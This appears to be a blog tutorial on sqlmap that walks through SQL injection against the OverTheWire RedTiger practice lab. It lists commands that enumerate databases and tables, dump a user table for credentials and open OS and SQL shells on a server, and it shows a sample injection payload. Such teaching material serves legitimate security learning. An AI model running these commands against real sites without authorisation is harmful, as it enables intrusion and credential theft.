Last updated on Feb. 28, 2021, 2:09 p.m. by rugved62321
What is sqlmap?
sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over database servers. It comes with a powerful detection engine, many niche features for the ultimate penetration tester and a broad range of switches lasting from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections.
Functionalities of SQLmap :-
To view all the options available in sqlmap use the following:
sqlmap -h, --help Show basic help message and exit
sqlmap -hh Show advanced help message and exit
Lets understand various functionalities by taking a sample hosted website and try finding its username and password.
To check if a site is vulnerable run the most basic and important command of sqlmap.
sqlmap -u https://redtiger.labs.overthewire.org/level1.php?cat=1
If you use more threads, results will be obtained fast but it also means sending more number of request so there is a possibility of firewall blocking you.
The threads option allows the user to define the number of concurrent requests to be sent by the SQLMap tool. This would reduce the overall testing time. This should not be kept to a higher value, as it may impact the accuracy of the result.
Here sqlmap has detected that the database is ‘MySQL’. And it's asking if we want to skip tests for other DBMS. We select yes now so it will only run tests assuming MySQL database. This would make the process faster.
What this will do is send some types of queries like “AND error-based”, ”OR error-based”, ”inline queries”, “time based queries”
Now what it is saying is the first parameter of the url is vulnerable i.e we can use it to exploit data. Further it is asking if we want it to check for further parameters but in our case we have taken the url with a single parameter “cat”.
In case our url was https://redtiger.labs.overthewire.org/level1.php?cat=1&id=2 and we wish to also check if id is vulnerable too or not then we would say “Yes” to the above command. It would do the same as done in the case of the first parameter.
So this is the result of testing. It has listed the “injection point”, number of requests it made and the type,title and payload of injection points.
Lets understand what it means:
Consider first result:
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: cat=1 AND 8204=8204
The important thing is the payload “cat=1 AND 8204=8204”. What it means that the url + payload is the injection point. We can see that category is displayed - “The hackit is cool...”
--current-user Retrieve DBMS current user
--current-db Retrieve DBMS current database
--tables Enumerate DBMS database tables
Now that we have figured out the database name, let's try to get the table name inside it.
sqlmap -u https://redtiger.labs.overthewire.org/level1.php?cat=1 -D hackit --tables
But as we can see that it could not get the table names. But a work around in this situation is that sqlmap will check from its list of common table names (common-tables.txt) and see if any such table with name matching with list in common-tables.txt exists in the hackit database.
As we can see that operation was successful and we have obtained the table name as “level1_users”
sqlmap -u https://redtiger.labs.overthewire.org/level1.php?cat=1 -D hackit -T level1_users --columns
sqlmap -u https://redtiger.labs.overthewire.org/level1.php?cat=1 -D hackit -T level1_users --dump
6) We have the username and password lets try logging into the website
Crawl is an important option which allows the SQLMap tool to crawl the website, starting from the root location. The depth to crawl can be defined in the command.
sqlmap -u http://192.168.202.160/ –crawl=1
–crawl: Define a depth to crawl. (Example: Defining 2 will allow the tool to crawl up to two directories)
If we want to exclude any page from the crawler’s scope we can define by –crawl-exclude. This is a useful option when we are crawling a post login page.
sqlmap -u http://192.168.202.163/ –crawl=3 –cookie=”cookie value” –crawl-exclude=”logout”
This command will crawl the website up to three directories and exclude any URL where “logout” keyword is present.As you can see below, SQLMap has crawled the website but excluded the logout URL.
Let’s run the same command without the –crawl-exclude option:
As seen below when –crawl-exclude is not defined, SQLMap has crawled the logout URL. This would allow the existing session to be invalidated (due to logout) and not complete the scan.
The batch command is used for non-interactive sessions. When we are trying to scan something, SQLMap may ask us to provide input during the scan: for example, while using the crawl feature, the tool asks the user if the user want to scan the identified URL. When –batch is defined in the command, the tool uses a default value to proceed without asking the user.
A page URL with a form field (say login page) can be provided along with the –form option to parse the page and guide the user to test the identified fields.
Now pages with large number of form fields can be tested effectively using –form and –batch option together. This will parse the page and check for form fields and automatically provide the input on behalf on the user.
If the entire application has to be scanned, the crawl option along with form and switch can be used.
In case we want to see the payload being sent by the tool, we can use the verbose option. The values range from 1 to 6.
We can run the OS/system level commands if the current database user has DBA rights. We can use the following options:
For a Linux server:
sqlmap -u http://192.168.202.162/cat.php?id=1 –os-shell
For a Windows server:
sqlmap -u http://192.168.202.162/cat.php?id=1 –os-cmd <cmd>
We can run the SQL statement on the database by running the following commands:
sqlmap -u 192.168.202.164/cat.php?id=2 –sql-shell
Feb. 24, 2021, 10:20 a.m.
Jan. 27, 2021, 12:26 p.m.
Jan. 27, 2021, 12:06 p.m.
Morgan Stanley Interview Experience (On-Campus for Internship)
Jan. 23, 2021, 6:56 p.m.